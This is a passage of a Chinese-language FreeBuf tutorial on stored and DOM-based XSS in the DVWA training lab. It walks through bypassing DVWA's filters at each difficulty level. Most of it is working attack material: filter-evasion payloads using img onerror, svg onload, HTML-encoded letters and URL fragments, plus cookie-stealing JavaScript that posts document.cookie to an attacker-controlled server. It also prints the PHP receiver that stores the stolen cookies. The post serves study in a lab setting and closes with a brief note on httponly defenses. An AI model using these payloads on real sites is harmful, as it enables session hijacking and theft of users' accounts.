这是因为ajax严格遵从同源策略，当前加载cookie.js的域为http://192.168.50.128:8080,所以ajax不能读取不同域http://192.168.50.150下的数据，但是cookie已经被发送到了http://192.168.50.150域，steal.php已经将偷取到的cookie存放在了数据库中,而且页面没有刷新，很隐蔽。

通过DVWA学习XSS

还有一种方式，为了更好的兼容浏览器，我们可以使用juery ajax 删除目标网站之前的payload，输入

Name:<script src="http://cdn.static.runoob.com/libs/jquery/1.10.2/jquery.min.js"></script><script src="http://192.168.50.150/dvwaxss/cookie.js"></script>
Message:send cookie use juery ajax

通过DVWA学习XSS

使用juery前要先<script src="http://cdn.static.runoob.com/libs/jquery/1.10.2/jquery.min.js"></script>引入
由于dvwa中guestbook的name字段有长度限制，为了实验效果，我们用phpmyadmin将name列的varchar改为1000
服务端juery代码

$(document).ready(function(){
    $.post("http://192.168.50.150/dvwaxss/steal.php",{data:document.cookie});
}
);

上面的代码同样的构造post请求将cookie作为post参数发送给steal.php
然后提交我们的输入
可见页面加载了我们的cookie.js

通过DVWA学习XSS

同时ajax也执行了

通过DVWA学习XSS

cookie也被偷取到了

通过DVWA学习XSS

medium级别

代码如下

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

主要过滤的地方有

$message = trim( $_POST[ 'mtxMessage' ] );
$name    = trim( $_POST[ 'txtName' ] );    
$message = htmlspecialchars( $message );
$name = str_replace( '<script>', '', $name );

对mtxMessage进行了htmlspecialchars转义，但是没有转义txtName，只是把<script>替换为了空，和之前的反射型xss一样，转化为大写<SCRIPT>或者<scr<script>ipt>绕过即可，下面的和low级别利用方式一样，这里不再重复

high 级别

代码如下

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

触发点还是在Name域，和反射型xss high级别的过滤方法一样

$name    = trim( $_POST[ 'txtName' ] );
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );

用img标签绕过即可，有不明白的地方参考上一节反射型，编写payload验证xss的存在,输入

Name:<img src=# onerror="alert('xss')">
Message:test xss

通过DVWA学习XSS

弹框，证明有xss的存在

通过DVWA学习XSS

接下来编写payload获取用户cookie，用firebug将maxlength改为1000，再输入之前先将之前插入数据库的payload删除，然后输入

Name:<img src=# onerror='var url="http://192.168.50.150/dvwaxss/steal.php";var postStr="data="+document.cook&#x69;e;var ajax=null;&#x69;f(w&#x69;ndow.XMLHttpRequest){ajax=new XMLHttpRequest();}else &#x69;f(w&#x69;ndow.Act&#x69;veXObject){ajax=new Act&#x69;veXObject("M&#x69;crosoft.XMLHTTP");}else{ajax=null;}ajax.open("POST", url, true);ajax.setRequestHeader("Content-Type", "appl&#x69;cat&#x69;on/x-www-form-urlencoded");ajax.send(postStr);'>
Message:send cookie use ajax

直接在onerror后使用ajax将当前网站用户的cookie用ajax发送到http://192.168.50.150/dvwaxss/steal.php,为了绕过过滤对所有”i”这个字母进行了html编码，为i
提交payload
查看元素

通过DVWA学习XSS

查看firebug控制台，有

已拦截跨源请求：同源策略禁止读取位于 http://192.168.50.150/dvwaxss/steal.php 的远程资源。（原因：CORS 头缺少 'Access-Control-Allow-Origin'）,可以看出ajax已经执行，将cookie发送到http://192.168.50.150/dvwaxss/steal.php

通过DVWA学习XSS

偷取到的cookie被steal.php存入数据库

通过DVWA学习XSS

另外一种方式是利用juery ajax

编写payload

Name:<img src=# onerror="var a=document.createElement('scr&#x69;pt'); a.setAttr&#x69;bute('src', 'http://cdn.stat&#x69;c.runoob.com/l&#x69;bs/jquery/1.10.2/jquery.m&#x69;n.js'); document.getElementsByTagName('head')[0].appendCh&#x69;ld(a);var b= document.createElement('scr&#x69;pt'); b.setAttr&#x69;bute('src','http://192.168.50.150/xss_s/cook&#x69;e.js');
document.getElementsByTagName('head')[0].appendCh&#x69;ld(b);">
Message:send cookie use juery ajax

通过DVWA学习XSS

同样的为了绕过过滤对所有的字母”i”进行html编码
onerror里的js代码是利用javascript DOM操作动态创造script标签，然后用setAttribute给src赋值，分别加载http://cdn.static.runoob.com/libs/jquery/1.10.2/jquery.min.js和http://192.168.50.150/xss_s/cookie.js
http://192.168.50.150/xss_s/cookie.js代码为

$(document).ready(function(){
$.post("http://192.168.50.150/dvwaxss/steal.php",{data:document.cookie});
}
);

和上面的一样 ，提交payload

通过DVWA学习XSS

javascript DOM操作已经在页面重新加载时在head标签下创造了两个script标签去加载js脚本

通过DVWA学习XSS

cookie已经发送给了http://192.168.50.150/dvwaxss/steal.php

通过DVWA学习XSS

被steal.php存入数据库

通过DVWA学习XSS

dvwa DOM型XSS

dom xss

xss主要分为三种，前面通过了dvwa分别研究了反射型和存储型两种xss，这次写篇有关dom xss的文章，dom xss和前面的两种xss的区别主要是：dom xss的产生并没有和后台服务器产生交互，而是通过浏览器的dom树解析产生的，下面来学习一下这种xss。

测试环境

一台win2003虚拟机，ip为192.168.50.128，用wamp集成环境将dvwa搭在8080端口
一台win7虚拟机，ip为192.168.50.156,用来接受漏洞网站的cookie，web由phpstudy搭建

low级别

服务器端没有任何php代码，查看前端页面源代码，处理用户输入的只有前端的js代码：

<script>
    if (document.location.href.indexOf("default=") >= 0) {
    var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
    document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>");
    document.write("<option value='' disabled='disabled'>----</option>");
    }

    document.write("<option value='English'>English</option>");
    document.write("<option value='French'>French</option>");
    document.write("<option value='Spanish'>Spanish</option>");
    document.write("<option value='German'>German</option>");
</script>

我们从选择列表选择的值赋值给default附加到url后，这段js代码将url中default的值赋给option标签的value属性节点和文本节点
构造payload:http://192.168.50.128:8080/DVWA-master/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(%22xss%22)%3C/script%3E,弹框证明有xss的存在，浏览器在解析html dom树时就会触发js弹框代码

通过DVWA学习XSS

接下来利用dom xss获取网站的cookie，构造连接

http://192.168.50.128:8080/DVWA-master/vulnerabilities/xss_d/?default=%3Cscript%20src=http://192.168.50.156/dvwaxss/cookie.js%3E%3C/script%3E
用script标签加载远程服务器上我们编写的获取网站用户cookie的js代码,和之前的一样利用ajax

通过DVWA学习XSS

var url = "http://192.168.50.156/dvwaxss/steal.php";
var postStr = "data="+document.cookie;
var ajax = null;
if (window.XMLHttpRequest) {
    ajax = new XMLHttpRequest();
} else if (window.ActiveXObject) {
    ajax = new ActiveXObject("Microsoft.XMLHTTP");
} else {
    ajax=null;
}
ajax.open("POST", url, true);//true代表异步
ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajax.send(postStr);

上面编写的代码创建了一个ajax对象，构造了一个post请求将用户的cookie作为参数发送到了http://192.168.50.156/dvwaxss/steal.php,也就是当前目录下的steal.php

<?php
header("content-type:text/html;charset=utf-8");
$conn=mysql_connect("localhost","root","root");
mysql_select_db("dvwacookie",$conn);
if(isset($_GET['data']))
{
    $sql="insert into low(cookie) values('".$_GET['data']."');";
    $result=mysql_query($sql,$conn);
    mysql_close();
}
else if(isset($_POST['data']))
{
    $sql="insert into low(cookie) values('".$_POST['data']."');";
    $result=mysql_query($sql,$conn);
    mysql_close();
}
else
{
    $sql="select * from low";
    $result=mysql_query($sql,$conn);
    while($row=mysql_fetch_array($result))
    {
        echo "偷取的cookie:".$row[1]."</br>";
    }
    mysql_close();
}
?>

steal.php将我们获取到的cookie存到数据库中
可以看到数据库已经接收到了网站用户的cookie

通过DVWA学习XSS

mark

同样的还可以使用juery ajax，构造连接

http://192.168.50.128:8080/DVWA-master/vulnerabilities/xss_d/?default=%3Cscript%20src=%22http://cdn.static.runoob.com/libs/jquery/1.10.2/jquery.min.js%22%3E%3C/script%3E%3Cscript%20src=http://192.168.50.156/dvwaxss/cookie.js%3E%3C/script%3E

代码如下

$(document).ready(function(){
$.post("http://192.168.50.156/dvwaxss/steal.php",{data:document.cookie});
}
);

通过DVWA学习XSS

同样接收到了cookie

mark

medium级别

前端代码如下，和low级别的一样

<script>
    if (document.location.href.indexOf("default=") >= 0) {
    var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
    document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>");
    document.write("<option value='' disabled='disabled'>----</option>");
    }

    document.write("<option value='English'>English</option>");
    document.write("<option value='French'>French</option>");
    document.write("<option value='Spanish'>Spanish</option>");
    document.write("<option value='German'>German</option>");
</script>

但是后端代码对url的default参数的值做了限制

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];

    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?>

不允许出现script标签，否则就将default的值设为默认的English，stripos还防止了大小写绕过
这里的绕过有两种方式
方式1
url中有一个字符为#，该字符后的数据不会发送到服务器端，从而绕过服务端过滤，构造连接为

http://192.168.50.128:8080/DVWA-master/vulnerabilities/xss_d/?#default=%3Cscript%3Ealert(%22xss%22)%3C/script%3E

可以看出成功绕过

通过DVWA学习XSS

方法2
或者就是用img标签或其他标签的特性去执行js代码，比如img标签的onerror事件，构造连接

http://192.168.50.128:8080/DVWA-master/vulnerabilities/xss_d/?default=%3C/option%3E%3C/select%3E%3Cimg%20src=#%20onerror=alert(%22xss%22)%3E

注意这里要闭合option以及select标签，这样做会破坏页面结构，隐蔽性不如第一种方法，同样的标签还有svg等，比如

http://192.168.50.128:8080/DVWA-master/vulnerabilities/xss_d/?default=%3C/option%3E%3C/select%3E%3Csvg%20onload=alert("xss")%3E

svg的onload事件同样可以在页面加载时执行js代码，产生弹框的效果，同样的标签还有好多
下面我们用这些方法加载远程js脚本获取网站用户的cookie(发送cookie的代码用juery)

http://192.168.50.128:8080/DVWA-master/vulnerabilities/xss_d/#?default=%3Cscript%20src=%22http://cdn.static.runoob.com/libs/jquery/1.10.2/jquery.min.js%22%3E%3C/script%3E%3Cscript%20src=http://192.168.50.156/dvwaxss/cookie.js%3E%3C/script%3E

img标签onerror事件加载

http://192.168.50.128:8080/DVWA-master/vulnerabilities/xss_d/?default=%3C/option%3E%3C/select%3E%3Cimg%20src=#%20onerror=%22var%20b=%20document.createElement(%27script%27);%20b.setAttribute(%27src%27,%27http://192.168.50.156/dvwaxss/cookie.js%27);document.getElementsByTagName(%27head%27)[0].appendChild(b);%22%3E

onerror事件后执行js代码，通过js的dom操作创建script标签加载远程脚本，下面是onerror事件后执行的js代码，和上一节的一样

通过DVWA学习XSS

var b= document.createElement('script'); 
b.setAttribute('src','http://192.168.50.156/dvwaxss/cookie.js');
document.getElementsByTagName('head')[0].appendChild(b);

远程获取cookie脚本

var url = "http://192.168.50.156/dvwaxss/steal.php";
var postStr = "data="+document.cookie;
var ajax = null;
if (window.XMLHttpRequest) {
    ajax = new XMLHttpRequest();
} else if (window.ActiveXObject) {
    ajax = new ActiveXObject("Microsoft.XMLHTTP");
} else {
    ajax=null;
}
ajax.open("POST", url, true);
ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajax.send(postStr);

通过DVWA学习XSS

同样svg标签的onload也可以，构造连接

http://192.168.50.128:8080/DVWA-master/vulnerabilities/xss_d/?default=%3C/option%3E%3C/select%3E%3Csvg%20onload=%22var%20b=%20document.createElement(%27script%27);%20b.setAttribute(%27src%27,%27http://192.168.50.156/dvwaxss/cookie.js%27);document.getElementsByTagName(%27head%27)[0].appendChild(b);%22%3E

通过DVWA学习XSS

以上方法均可以绕过medium加载远程脚本获取网站用户cookie

###high级别###

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?>

在服务器后端判断，要求default的值必须为select选择菜单中的值，这里继续用上面的#符号绕过即可，构造payload

http://192.168.50.128:8080/DVWA-master/vulnerabilities/xss_d/?default=English#%3Cscript%20src=%22http://cdn.static.runoob.com/libs/jquery/1.10.2/jquery.min.js%22%3E%3C/script%3E%3Cscript%20src=http://192.168.50.156/dvwaxss/cookie.js%3E%3C/script%3E

通过DVWA学习XSS

加载远程脚本

$(document).ready(function(){
$.post("http://192.168.50.156/dvwaxss/steal.php",{data:document.cookie});
}
);

获取high级别的网站用户cookie

通过DVWA学习XSS

总结

通过对dvwa三种类型xss的学习，可以看出预防xss的方法不光要做到过滤一切用户有害输入，转义可能引起跨站漏洞的标签，最重要的是重http层做到防护，给cookie设置httponly属性，使cookie不能被javascript读取，才能有效防止用户cookie被盗用的问题

本文作者：lawliet，本文属 FreeBuf 原创奖励计划，未经许可禁止转载。

backup

又一个WordPress站点

作者：LlawLiet

Linux下几种反弹Shell方法的总结与理解

实验环境

方法1：

方法2：

方法3：

方法4：

总结

ARP协议分析&python编程实现ARP欺骗抓图片

序

实战环境

arp协议研究

arp协议数据包

arp请求包

arp响应包

arp欺骗

用python实现arp攻击

新手科普 | 通过DVWA学习XSS

简介

dvwa反射型xss

测试环境

low级别

medium级别

high 级别

dvwa存储型xss

测试环境

low级别

medium级别

high 级别

dvwa DOM型XSS

dom xss

测试环境

low级别

medium级别

总结